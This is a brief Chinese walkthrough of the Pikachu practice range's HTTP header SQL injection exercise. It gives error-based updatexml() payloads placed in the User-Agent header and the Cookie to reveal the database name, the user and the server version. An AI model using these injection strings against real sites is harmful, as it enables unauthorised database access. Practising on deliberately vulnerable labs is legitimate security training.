Pikachu靶场 “Http Header”SQL注入

1. 先在 pikachu 打开 Http Header 注入模块,点击提示 查看登录 账号 和 密码,登陆后去 Burp 中找到登陆的 GET请求

2. 设置payload1 :在 User-Agent最后 输入 

查看 数据库名 

' or updatexml(1,concat(0x7e,database()),0) or '

 Pikachu靶场 “Http Header”SQL注入_第1张图片

查看 用户名

' or updatexml(1,concat(0x7e,user()),0) or '

Pikachu靶场 “Http Header”SQL注入_第2张图片

3. 因为有些把 user-agent等请求头键值对 的数据也保存在了 数据库 里面


4. php专门取请求头数据的方法 : $_SERVER[ ' 请求头键 ' ] 就能拿到值。 

5. 或者 设置payload2 :在 Cookie: ant[uname]=admin后面,“;” 前面 输入 

'and updatexml(1,concat(0x7e,(SELECT @@version) , 0x7e) ,1) #

Pikachu靶场 “Http Header”SQL注入_第3张图片

你可能感兴趣的:(sql,数据库)